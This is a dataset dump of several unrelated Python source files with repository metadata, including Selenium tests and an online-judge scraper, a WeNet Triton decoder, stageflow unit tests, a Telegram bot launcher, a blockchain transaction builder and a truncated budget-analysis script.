"MIT"
] | null | null | null |
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
"MIT"
] | 1
|
2016-01-15T11:28:06.000Z
|
2016-01-25T17:09:18.000Z
|
isaactest/tests/recieve_verify_emails.py
|
jsharkey13/isaac-selenium-testing
|
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
|
[
"MIT"
] | 1
|
2019-05-14T16:53:49.000Z
|
2019-05-14T16:53:49.000Z
|
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.i_selenium import assert_tab, image_div
from ..tests import TestWithDependency
__all__ = ["recieve_verify_emails"]
#####
# Test: Receive Verification Emails
#####
@TestWithDependency("RECIEVE_VERIFY_EMAILS", ["REQ_VERIFY_EMAILS"])
def recieve_verify_emails(driver, inbox, GUERRILLAMAIL, WAIT_DUR, **kwargs):
"""Test if the new verification emails are recieved.
- 'driver' should be a Selenium WebDriver.
- 'inbox' should be a GuerrillaInbox object.
- 'GUERRILLAMAIL' is the string URL of GuerrillaMail.
"""
verification_email_request_limit = 4
assert_tab(driver, GUERRILLAMAIL)
inbox.wait_for_email(WAIT_DUR, expected=verification_email_request_limit)
try:
verification_emails_recived = 0
log(INFO, "Checking if verification emails recieved.")
verification_emails = inbox.get_by_subject("Verify your email")
verification_emails_recived = len(verification_emails)
assert verification_emails_recived > 0
if verification_emails_recived != verification_email_request_limit:
log(ERROR, "Expected %s verification emails, received %s!" % (verification_email_request_limit, verification_emails_recived))
log(ERROR, "Will have to use last received verification email, not the last requested!")
else:
log(INFO, "Received all %s verification emails." % verification_email_request_limit)
for email in verification_emails:
email.image()
email.save_html_body()
log(PASS, "%s verification emails recieved." % verification_emails_recived)
return True
except AssertionError:
image_div(driver, "ERROR_recieve_verification")
log(ERROR, "Expected %s verification emails, no emails received! See 'ERROR_recieve_verification.png'!" % (verification_email_request_limit))
return False
| 44.181818
| 149
| 0.718107
| 0
| 0
| 0
| 0
| 1,716
| 0.882716
| 0
| 0
| 715
| 0.367798
|
b1a4e4ea2b00add4c4b415ad7ce218f992351283
| 536
|
py
|
Python
|
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
setup.py
|
msabramo/grr
|
4b13392528d61a3d42e6c3baa14fa74cc920c055
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from setuptools import setup
import sys
setup(
name='grr',
version='0.2',
author='Kunal Mehta',
author_email='legoktm@gmail.com',
url='https://github.com/legoktm/grr/',
license='CC-0',
description='A command-line utility to work with Gerrit',
long_description=open('README.rst').read(),
packages=['grr'],
install_requires=['configparser'] if sys.version_info[0] == 2 else [],
entry_points={
'console_scripts': [
'grr = grr:main'
],
}
)
| 24.363636
| 74
| 0.613806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 211
| 0.393657
|
b1a5144b5a072c013aabc225925d03cb09f975fc
| 11,553
|
py
|
Python
|
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | null | null | null |
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | null | null | null |
runtime/server/x86_gpu/model_repo_stateful/wenet/1/wenet_onnx_model.py
|
zelda3721/wenet
|
f41555469b93bcc055a95432dd14fd1400522964
|
[
"Apache-2.0"
] | 1
|
2022-02-08T07:39:13.000Z
|
2022-02-08T07:39:13.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import numpy as np
import os
import torch
import triton_python_backend_utils as pb_utils
from torch.utils.dlpack import to_dlpack, from_dlpack
from swig_decoders import ctc_beam_search_decoder_batch, Scorer, map_batch
class WenetModel(object):
def __init__(self, model_config, device):
params = self.parse_model_parameters(model_config)
self.device = device
print("Using device", device)
print("Successfully load model !")
# load vocabulary
ret = self.load_vocab(params["vocab_path"])
self.id2vocab, self.vocab, space_id, blank_id, sos_eos = ret
self.space_id = space_id if space_id else -1
self.blank_id = blank_id if blank_id else 0
self.eos = self.sos = sos_eos if sos_eos else len(self.vocab) - 1
print("Successfully load vocabulary !")
self.params = params
# beam search setting
self.beam_size = params.get("beam_size")
self.cutoff_prob = params.get("cutoff_prob")
# language model
lm_path = params.get("lm_path", None)
alpha, beta = params.get('alpha'), params.get('beta')
self.scorer = None
        if lm_path and os.path.exists(lm_path):  # lm_path may be None when no language model is configured
self.scorer = Scorer(alpha, beta, lm_path, self.vocab)
self.bidecoder = params.get('bidecoder')
# rescore setting
self.rescoring = params.get("rescoring", 0)
print("Using rescoring:", bool(self.rescoring))
print("Successfully load all parameters!")
self.dtype = torch.float16
def generate_init_cache(self):
encoder_out = None
return encoder_out
def load_vocab(self, vocab_file):
"""
load lang_char.txt
"""
id2vocab = {}
space_id, blank_id, sos_eos = None, None, None
with open(vocab_file, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
char, id = line.split()
id2vocab[int(id)] = char
if char == " ":
space_id = int(id)
elif char == "<blank>":
blank_id = int(id)
elif char == "<sos/eos>":
sos_eos = int(id)
vocab = [0] * len(id2vocab)
for id, char in id2vocab.items():
vocab[id] = char
return (id2vocab, vocab, space_id, blank_id, sos_eos)
def parse_model_parameters(self, model_parameters):
model_p = {"beam_size": 10,
"cutoff_prob": 0.999,
"vocab_path": None,
"lm_path": None,
"alpha": 2.0,
"beta": 1.0,
"rescoring": 0,
"bidecoder": 1}
# get parameter configurations
for li in model_parameters.items():
key, value = li
true_value = value["string_value"]
if key not in model_p:
continue
key_type = type(model_p[key])
if key_type == type(None):
model_p[key] = true_value
else:
model_p[key] = key_type(true_value)
assert model_p["vocab_path"] is not None
return model_p
def infer(self, batch_log_probs, batch_log_probs_idx,
seq_lens, rescore_index, batch_states):
"""
batch_states = [trieVector, batch_start,
batch_encoder_hist, cur_encoder_out]
"""
trie_vector, batch_start, batch_encoder_hist, cur_encoder_out = batch_states
num_processes = min(multiprocessing.cpu_count(), len(batch_log_probs))
score_hyps = self.batch_ctc_prefix_beam_search_cpu(batch_log_probs,
batch_log_probs_idx,
seq_lens,
trie_vector,
batch_start,
self.beam_size,
self.blank_id,
self.space_id,
self.cutoff_prob,
num_processes,
self.scorer)
if self.rescoring and len(rescore_index) != 0:
# find the end of sequence
rescore_encoder_hist = []
rescore_encoder_lens = []
rescore_hyps = []
res_idx = list(rescore_index.keys())
max_length = -1
for idx in res_idx:
hist_enc = batch_encoder_hist[idx]
if hist_enc is None:
cur_enc = cur_encoder_out[idx]
else:
cur_enc = torch.cat([hist_enc, cur_encoder_out[idx]], axis=0)
rescore_encoder_hist.append(cur_enc)
cur_mask_len = int(len(hist_enc) + seq_lens[idx])
rescore_encoder_lens.append(cur_mask_len)
rescore_hyps.append(score_hyps[idx])
if cur_enc.shape[0] > max_length:
max_length = cur_enc.shape[0]
best_index = self.batch_rescoring(rescore_hyps, rescore_encoder_hist,
rescore_encoder_lens, max_length)
best_sent = []
j = 0
for idx, li in enumerate(score_hyps):
if idx in rescore_index and self.rescoring:
best_sent.append(li[best_index[j]][1])
j += 1
else:
best_sent.append(li[0][1])
final_result = map_batch(best_sent, self.vocab, num_processes)
return final_result, cur_encoder_out
def batch_ctc_prefix_beam_search_cpu(self, batch_log_probs_seq,
batch_log_probs_idx,
batch_len, batch_root,
batch_start, beam_size,
blank_id, space_id,
cutoff_prob, num_processes,
scorer):
"""
Return: Batch x Beam_size elements, each element is a tuple
(score, list of ids),
"""
batch_len_list = batch_len
batch_log_probs_seq_list = []
batch_log_probs_idx_list = []
for i in range(len(batch_len_list)):
cur_len = int(batch_len_list[i])
batch_log_probs_seq_list.append(batch_log_probs_seq[i][0:cur_len].tolist())
batch_log_probs_idx_list.append(batch_log_probs_idx[i][0:cur_len].tolist())
score_hyps = ctc_beam_search_decoder_batch(batch_log_probs_seq_list,
batch_log_probs_idx_list,
batch_root,
batch_start,
beam_size,
num_processes,
blank_id,
space_id,
cutoff_prob,
scorer)
return score_hyps
def batch_rescoring(self, score_hyps, hist_enc, hist_mask_len, max_len):
"""
score_hyps: [((ctc_score, (id1, id2, id3, ....)), (), ...), ....]
hist_enc: [len1xF, len2xF, .....]
hist_mask: [1x1xlen1, 1x1xlen2]
return bzx1 best_index
"""
bz = len(hist_enc)
f = hist_enc[0].shape[-1]
beam_size = self.beam_size
encoder_lens = np.zeros((bz, 1), dtype=np.int32)
encoder_out = torch.zeros((bz, max_len, f), dtype=self.dtype)
hyps = []
ctc_score = torch.zeros((bz, beam_size), dtype=self.dtype)
max_seq_len = 0
for i in range(bz):
cur_len = hist_enc[i].shape[0]
encoder_out[i, 0:cur_len] = hist_enc[i]
encoder_lens[i, 0] = hist_mask_len[i]
# process candidate
if len(score_hyps[i]) < beam_size:
to_append = (beam_size - len(score_hyps[i])) * [(-10000, ())]
score_hyps[i] = list(score_hyps[i]) + to_append
for idx, c in enumerate(score_hyps[i]):
score, idlist = c
if score < -10000:
score = -10000
ctc_score[i][idx] = score
hyps.append(list(idlist))
if len(hyps[-1]) > max_seq_len:
max_seq_len = len(hyps[-1])
max_seq_len += 2
hyps_pad_sos_eos = np.ones((bz, beam_size, max_seq_len), dtype=np.int64)
hyps_pad_sos_eos = hyps_pad_sos_eos * self.eos # fill eos
if self.bidecoder:
r_hyps_pad_sos_eos = np.ones((bz, beam_size, max_seq_len), dtype=np.int64)
r_hyps_pad_sos_eos = r_hyps_pad_sos_eos * self.eos
hyps_lens_sos = np.ones((bz, beam_size), dtype=np.int32)
bz_id = 0
for idx, cand in enumerate(hyps):
bz_id = idx // beam_size
length = len(cand) + 2
bz_offset = idx % beam_size
pad_cand = [self.sos] + cand + [self.eos]
hyps_pad_sos_eos[bz_id][bz_offset][0 : length] = pad_cand
if self.bidecoder:
r_pad_cand = [self.sos] + cand[::-1] + [self.eos]
r_hyps_pad_sos_eos[bz_id][bz_offset][0:length] = r_pad_cand
hyps_lens_sos[bz_id][idx % beam_size] = len(cand) + 1
in0 = pb_utils.Tensor.from_dlpack("encoder_out", to_dlpack(encoder_out))
in1 = pb_utils.Tensor("encoder_out_lens", encoder_lens)
in2 = pb_utils.Tensor("hyps_pad_sos_eos", hyps_pad_sos_eos)
in3 = pb_utils.Tensor("hyps_lens_sos", hyps_lens_sos)
input_tensors = [in0, in1, in2, in3]
if self.bidecoder:
in4 = pb_utils.Tensor("r_hyps_pad_sos_eos", r_hyps_pad_sos_eos)
input_tensors.append(in4)
in5 = pb_utils.Tensor.from_dlpack("ctc_score", to_dlpack(ctc_score))
input_tensors.append(in5)
request = pb_utils.InferenceRequest(model_name='decoder',
requested_output_names=['best_index'],
inputs=input_tensors)
response = request.exec()
best_index = pb_utils.get_output_tensor_by_name(response, 'best_index')
best_index = from_dlpack(best_index.to_dlpack()).clone()
best_index = best_index.numpy()[:, 0]
return best_index
def __del__(self):
print("remove wenet model")
| 42.947955
| 87
| 0.528348
| 10,698
| 0.925993
| 0
| 0
| 0
| 0
| 0
| 0
| 1,736
| 0.150264
|
b1a58559665e94514cdf1de5372c35158b389ecc
| 7,254
|
py
|
Python
|
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
stuojchaques.py
|
sunlupeng2020/stuoj
|
f8c109894e7a7118dc632fef34c55a01fe116f9a
|
[
"Apache-2.0"
] | null | null | null |
# Fetch all of a student's challenge (submission) records,
# including time, result, code, etc.,
# and write them into the stuquestionbh table of the stuoj database
from selenium import webdriver
# from selenium.webdriver.common.by import By
import pymysql
import re
from bs4 import BeautifulSoup
import connsql
# import loginzznuoj
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import ojtmxx
import time
# driver_path = "D:\\ChromeCoreDownloads\\chromedriver_win32\\chromedriver.exe"
# driver = webdriver.Chrome()
driver = webdriver.PhantomJS()
cur = connsql.conn.cursor()
# Get the list of a student's submissions for a given problem on the OJ platform
def getOjQuesNo(stuno, quesno):  # student number, problem number
stuquesUrl = "http://47.95.10.46/status.php?pid="+str(quesno)+"&uid="+str(stuno)+"&language=-1&judgeresult=-1"
driver.get(stuquesUrl)
# pidtxtbox = driver.find_element_by_name("pid") # 输入题目id的textbox的id
# uidtxtbox = driver.find_element_by_name("uid") # 输入用户ID的textbox的id
# pidtxtbox.send_keys(quesno) # 填入题目ID
# uidtxtbox.send_keys(stuno) # 填入用户ID
# driver.find_elements_by_xpath("//button[@class='btn btn-default']")[0].click()
# button.click()
questrs = driver.find_elements_by_xpath("//tbody/tr")
sql = "insert into stuchallenged(challengeid,stuno,questionid,result,memory,timecost," \
"language,codelength,challtime) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
if len(questrs)>0:
for trbj in questrs:
trbjsplit = str(trbj.text).split(' ', 8)
# trbjsplit[1] = str(stuno)
# print(trbjsplit)
# trbjsplit[1] = '204215091027'
cur.execute(sql, trbjsplit)
# print(soup.text)
# print(button.text)
def loginzznuoj():  # log in
loginurl = 'http://47.95.10.46/loginpage.php'
driver.get(loginurl)
driver.find_element_by_name("username").send_keys('slp')
driver.find_element_by_name("password").send_keys('slp123456')
submitbutton = driver.find_element_by_tag_name("button")
# print(submitbutton.text)
submitbutton.click()
# try:
# WebDriverWait(driver, 10).until(EC.title_is("ZZNUOJ"))
# finally:
# pass
def getsubmitcode(quesno, submitno):  # get the submitted code from the submission id and problem id
    url = "http://47.95.10.46/problemsubmit.php?sid="+str(submitno)+"&pid="+str(quesno)  # visit the submission page
driver.get(url)
    # change the code textarea's display style from none to block so its contents can be read
js = "document.getElementById('source').style.display='block';"
driver.execute_script(js)
codes = driver.find_element_by_name("source").text
return codes
    # run the JS snippet; print(codeee)
def getstuquestions(stuno):  # search by student number for problems solved and attempted
    # visit the "ranklist" page of the Zhengzhou Normal University OJ platform
driver.get("http://47.95.10.46/ranklist.php")
    # find the username input box on the page
    driver.find_element_by_name("keyword").send_keys(stuno)  # enter the student number
    button = driver.find_elements_by_xpath("//button[@class='btn btn-default']")[1]  # .click()  # click the search button
# container.row.input-group.input-group-btn.btn.btn-default
button.click()
    # find the hyperlinks for student name, solved count, submission count, etc.
link1 = driver.find_elements_by_xpath("//div[@class='col-md-12']/table/tbody/tr/td/a")
i = 0
link = link1[0]
link.click()
    # find the problem-number hyperlinks
timuhaos = driver.find_elements_by_xpath("//div[@class='well collapse in']/a")
# print(timuhaos)
for tihaolink in timuhaos:
        # print(tihaolink.text)  # print the problem number
        # insert the problem numbers the student solved into the database
sql="insert into stuques(stuno,questionbh)values(%s,%s)"
cur.execute(sql, (stuno, tihaolink.text))
# print(stuno, tihaolink.text)
def getStuChallengenum(stuno):  # get a student's attempt count by student number
url = "http://47.95.10.46/ranklist.php?keyword="+str(stuno)
driver.get(url)
challed = driver.find_elements_by_xpath("//tbody//a")
    cnum = challed[3].text  # number of attempts
return cnum
# print(cnum)
def getstudentno(banjiid):  # get the list of student numbers for a class id
sql = "select stuno from student where banjiid =" + str(banjiid)
cur.execute(sql)
    results = cur.fetchall()  # fetch all rows: every student number
# cur.close()
return results
def getstudentxuehao():
    banjiids = tuple(range(1, 2))  # tuple of class ids
for banjiid in banjiids:
print(banjiid)
sql = "select stuno from student where banjiid =" + str(banjiid)
cur.execute(sql)
        results = cur.fetchall()  # fetch all rows: every student number
for stuno in results: # print(result[0])
            # get the number of problems the student completed
getstuquestions(stuno)
# getstudentxuehao()  # get the problem numbers all students solved
# getOjQuesNo('204215091001', '1003')
# cur.close()
def getBanjiChallengeNum(banjino):  # get a class's attempt counts and write them to the database
    stuojusernamelist = getbanjistuojusername(banjino)  # get the OJ usernames of the class's students
sqlupdate = "update student set challenge=%s where ojusername=%s"
# cur = connsql.conn.cursor()
for stuojusername in stuojusernamelist:
# print(stuojusername[0])
# print(getStuChallengenum(stuojusername[0]))
        cur.execute(sqlupdate, (getStuChallengenum(stuojusername[0]), stuojusername[0]))  # update the student's attempt count
def getbanjistuojusername(banjino):  # get the list of OJ usernames for a class id
sql = "select ojusername from student where banjiid=%s"
cur.execute(sql, (banjino,))
return cur.fetchall()
# Get a student's challenge records by student number
def getstuchallenge():
sql = "select `questionid`,`challengeid` from `stuchallenged` where `code` is null"
cur.execute(sql)
results = cur.fetchall()
return results
def updatequescode(quesno, submitno, code):  # update the code stored in the database
sql = "update `stuchallenged` set `code`=%s where `questionid`=%s and `challengeid`=%s"
cur.execute(sql,(code, quesno, submitno))
if __name__ == '__main__':
    # cur = connsql.conn.cursor()  # reference the conn variable from connsql
# getBanjiChallengeNum(1)
# getStuChallengenum('204215091001')
# getOjQuesNo('204215091001', '1003')
# print(getbanjistuojusername(1))
# cur.close()
    loginzznuoj()  # log in to the school OJ platform
time.sleep(2)
# codes = getsubmitcode(1000,1063215)
# print(codes)
# options.addArguments(
# "--user-data-dir=" + System.getenv("USERPROFILE") + "/AppData/Local/Google/Chrome/User Data/Default");
# driver.get("http://47.95.10.46/problemsubmit.php?sid=1063215&pid=1000")
results = getstuchallenge()
for result in results:
print(result)
# url = "http://47.95.10.46/problemsubmit.php?sid=" + str(result[1]) + "&pid=" + str(result[0]) # 访问提交页面
# # driver.get(url)
codes = getsubmitcode(result[0], result[1])
if len(codes) > 5000:
codes = codes[0:5000]
# print(codes)
        updatequescode(result[0], result[1], str(codes).strip())  # update the student's submitted code
# getsubmitcode('1003', '1068443')
    # Next: scrape every problem each student submitted (2021-01-17)
    # stuxhlist = getbanjistuojusername(1)  # list of student numbers for class 1
    # questionnolist = ojtmxx.getojallquesnofromdatabase()  # get the problem IDs from the database
# print(questionnolist)
# for stuno in stuxhlist:
    # stuno1 = stuno[0]  # student username
# for i in range(33, 35):
# stuno1='2042150910'+str(i)
# # if int(stuno1) > 204215091003:
# for questionno in questionnolist:
# questionno0 = questionno[0]
# print((stuno1, questionno0))
# getOjQuesNo(stuno1, questionno0)
# stuno1 = '204215091032'
# for questionno0 in range(1000, 2200):
# print((stuno1, questionno0))
# getOjQuesNo(stuno1, questionno0)
cur.close()
driver.close()
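# A minimal standalone sketch of the trick getsubmitcode() relies on: Selenium
# cannot read the text of an element styled display:none, so the style is flipped
# via JavaScript first. The element carries both name and id "source" on this OJ,
# as the code above assumes; the function name is hypothetical.
def read_hidden_textarea(driver, url, element_id='source'):
    driver.get(url)
    driver.execute_script(
        "document.getElementById('%s').style.display='block';" % element_id)
    return driver.find_element_by_name(element_id).text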
| 35.043478
| 114
| 0.666391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,856
| 0.593643
|
b1a5a19351b24a513cab2db62b55e27e8f29e1d1
| 3,899
|
py
|
Python
|
tests/test_core.py
|
TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | 3
|
2020-10-04T18:52:37.000Z
|
2022-02-21T13:21:45.000Z
|
tests/test_core.py
|
TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | 2
|
2020-05-28T03:33:47.000Z
|
2020-05-28T03:38:30.000Z
|
tests/test_core.py
|
TheCheapestPixels/panda3d-stageflow
|
7a049d939dec39e3ac780872bbaba5c25f309397
|
[
"BSD-3-Clause"
] | null | null | null |
from stageflow import Flow
from stageflow import Stage
def test_create_stage():
Stage()
def test_create_flow_bare():
flow = Flow()
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set([])
def test_create_flow_and_add_stage():
flow = Flow()
flow.add_stage('test', Stage())
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_stage():
flow = Flow(stages=dict(test=Stage()))
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_initial_stage():
class TestStage():
def enter(self, data):
pass
def exit(self):
pass
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
)
    assert flow.get_current_stage() == 'test'
assert set(flow.get_stages()) == set(['test'])
def test_initial_stage_data():
test_data = 'foo'
global passed_data
passed_data = None
class TestStage(Stage):
def enter(self, data):
global passed_data
passed_data = data
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
initial_stage_data=test_data,
)
assert passed_data == test_data
assert flow.get_current_stage() == 'test'
def test_transition_entry():
global has_exited
has_exited = False
exit_data = 'foo_bar_baz'
global entry_data
entry_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = data
def exit(self, data):
global has_exited
has_exited = True
return exit_data
flow = Flow(
stages=dict(
test_a=TestStage(),
test_b=TestStage(),
),
initial_stage='test_a',
)
assert flow.get_current_stage() == 'test_a'
assert entry_data is None
assert not has_exited
flow.transition('test_b')
assert flow.get_current_stage() == 'test_b'
assert entry_data == exit_data
assert has_exited
def test_pushing_substage():
global entry_data
entry_data = None
global exit_data
exit_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = 'stage'
def exit(self, data):
global exit_data
exit_data = 'stage'
def exit_to_substage(self, substage, data):
global exit_data
exit_data = 'stage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'stage'
class TestSubstage(Stage):
def enter(self, data):
global entry_data
entry_data = 'substage'
def exit(self, data):
global exit_data
exit_data = 'substage'
def exit_to_substage(self, data):
global exit_data
exit_data = 'substage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'substage'
flow = Flow(
stages=dict(test=TestStage()),
substages=dict(test_substage=TestSubstage()),
initial_stage='test',
)
assert exit_data is None
assert entry_data == 'stage'
assert flow.get_current_substage() is None
flow.push_substage('test_substage')
assert exit_data == 'stage'
assert entry_data == 'substage'
assert flow.get_current_substage() == 'test_substage'
flow.pop_substage()
assert exit_data == 'substage'
assert entry_data == 'stage'
assert flow.get_current_substage() is None
# FIXME: Now add the ways that Flow *shouldn't* be usable:
# * transitioning to non-existent stages
# * passing invalid objects to Flow(stages=...)
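# A minimal sketch of the first missing case. That Flow raises KeyError for an
# unknown stage name is an assumption about stageflow's internals (a dict
# lookup), not documented behaviour.
import pytest

def test_transition_to_nonexistent_stage():
    class TestStage(Stage):
        def enter(self, data):
            pass
        def exit(self, data):
            pass
    flow = Flow(stages=dict(test=TestStage()), initial_stage='test')
    with pytest.raises(KeyError):
        flow.transition('nowhere')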
| 24.36875
| 58
| 0.616055
| 1,344
| 0.344704
| 0
| 0
| 0
| 0
| 0
| 0
| 388
| 0.099513
|
b1a639ae9556a6f333b9ef26546b354a0f37d7a5
| 1,925
|
py
|
Python
|
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/__main__.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | 1
|
2021-12-01T10:17:55.000Z
|
2021-12-01T10:17:55.000Z
|
import asyncio
import time
import uvloop
import importlib
from pyrogram import Client as Bot, idle
from .config import API_ID, API_HASH, BOT_TOKEN, MONGO_DB_URI, SUDO_USERS, LOG_GROUP_ID
from Yukki import BOT_NAME, ASSNAME, app, chacha, aiohttpsession
from Yukki.YukkiUtilities.database.functions import clean_restart_stage
from Yukki.YukkiUtilities.database.queue import (get_active_chats, remove_active_chat)
from .YukkiUtilities.tgcallsrun import run
from motor.motor_asyncio import AsyncIOMotorClient as MongoClient
Bot(
':yukki:',
API_ID,
API_HASH,
bot_token=BOT_TOKEN,
plugins={'root': 'Yukki.Plugins'},
).start()
print(f"[INFO]: BOT STARTED AS {BOT_NAME}!")
print(f"[INFO]: ASSISTANT STARTED AS {ASSNAME}!")
async def load_start():
restart_data = await clean_restart_stage()
if restart_data:
print("[INFO]: SENDING RESTART STATUS")
try:
await app.edit_message_text(
restart_data["chat_id"],
restart_data["message_id"],
"**Restarted the Bot Successfully.**",
)
except Exception:
pass
served_chats = []
try:
chats = await get_active_chats()
for chat in chats:
served_chats.append(int(chat["chat_id"]))
except Exception as e:
print("Error came while clearing db")
for served_chat in served_chats:
try:
await remove_active_chat(served_chat)
except Exception as e:
print("Error came while clearing db")
pass
await app.send_message(LOG_GROUP_ID, "Bot Started")
await chacha.send_message(LOG_GROUP_ID, "Assistant Started")
print("[INFO]: STARTED")
loop = asyncio.get_event_loop()
loop.run_until_complete(load_start())
run()
loop.close()
print("[LOG] CLOSING BOT")
| 29.166667
| 90
| 0.662338
| 0
| 0
| 0
| 0
| 0
| 0
| 1,010
| 0.524675
| 336
| 0.174545
|
b1a71b362a63e180bb73d60affe130cb3f02f9e9
| 3,180
|
py
|
Python
|
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | null | null | null |
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | 7
|
2019-08-28T00:19:28.000Z
|
2020-07-31T07:07:53.000Z
|
loopchain/blockchain/transactions/transaction_builder.py
|
metalg0su/loopchain
|
dd27f8f42a350d1b22b0985749b1e821c053fe49
|
[
"Apache-2.0"
] | null | null | null |
import hashlib
from abc import abstractmethod, ABC
from typing import TYPE_CHECKING
from .. import Signature, ExternalAddress, Hash32
from loopchain.crypto.hashing import build_hash_generator
if TYPE_CHECKING:
from secp256k1 import PrivateKey
from . import Transaction, TransactionVersioner
class TransactionBuilder(ABC):
_hash_salt = None
def __init__(self, hash_generator_version: int):
self._hash_generator = build_hash_generator(hash_generator_version, self._hash_salt)
# Attributes that must be assigned
self.private_key: 'PrivateKey' = None
# Attributes to be generated
self.from_address: 'ExternalAddress' = None
self.hash: 'Hash32' = None
self.signature: 'Signature' = None
self.origin_data: dict = None
self.raw_data: dict = None
def reset_cache(self):
self.from_address = None
self.hash = None
self.signature = None
self.origin_data = None
self.raw_data = None
@abstractmethod
def build(self) -> 'Transaction':
raise NotImplementedError
def build_hash(self):
if self.origin_data is None:
raise RuntimeError(f"origin data is required. Run build_origin_data.")
self.hash = self._build_hash()
return self.hash
def _build_hash(self):
return Hash32(self._hash_generator.generate_hash(self.origin_data))
def build_from_address(self):
if self.private_key is None:
raise RuntimeError(f"private_key is required.")
self.from_address = self._build_from_address()
return self.from_address
def _build_from_address(self):
serialized_pub = self.private_key.pubkey.serialize(compressed=False)
hashed_pub = hashlib.sha3_256(serialized_pub[1:]).digest()
return ExternalAddress(hashed_pub[-20:])
@abstractmethod
def build_raw_data(self) -> dict:
pass
@abstractmethod
def build_origin_data(self) -> dict:
pass
def sign(self):
if self.hash is None:
self.build_hash()
self.signature = self._sign()
return self.signature
def _sign(self):
raw_sig = self.private_key.ecdsa_sign_recoverable(msg=self.hash,
raw=True,
digest=hashlib.sha3_256)
serialized_sig, recover_id = self.private_key.ecdsa_recoverable_serialize(raw_sig)
signature = serialized_sig + bytes((recover_id, ))
return Signature(signature)
@classmethod
def new(cls, version: str, versioner: 'TransactionVersioner'):
from . import genesis, v2, v3
hash_generator_version = versioner.get_hash_generator_version(version)
if version == genesis.version:
return genesis.TransactionBuilder(hash_generator_version)
elif version == v2.version:
return v2.TransactionBuilder(hash_generator_version)
elif version == v3.version:
return v3.TransactionBuilder(hash_generator_version)
raise RuntimeError(f"Not supported tx version({version})")
| 32.783505
| 92
| 0.659119
| 2,876
| 0.904403
| 0
| 0
| 797
| 0.250629
| 0
| 0
| 260
| 0.081761
|
b1a7a9bcfc93410c2986fe9c347507c8fbff9db4
| 1,132
|
py
|
Python
|
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
yongjinjiang/python-challenge
|
4b266976baf8339186fae7140024ae5a3af3bc76
|
[
"ADSL"
] | null | null | null |
import csv
import os
resource_dir="/Users/jyj/OneDrive/A_A_Data_Analysis/MINSTP201808DATA2/03-Python/Homework/PyBank/Resources"
file_path=os.path.join(resource_dir,"budget_data.csv")
with open(file_path,newline="") as data_file:
csvreader=csv.reader(data_file,delimiter=",")
next(csvreader)
i=0
Num_month=0
Pro_each_month=[]
months=[]
for row in csvreader:
#print(row)
months.append(row[0])
Pro_each_month.append(float(row[1]))
# if i==5:
# break
# i=i+1
Num_month=Num_month+1
print("Financial Analysis")
print("____________________")
print("Total Months:{}".format(Num_month))
print("Total:${}".format(sum(Pro_each_month)))
ss1=Pro_each_month[:-1]
ss2=Pro_each_month[1:]
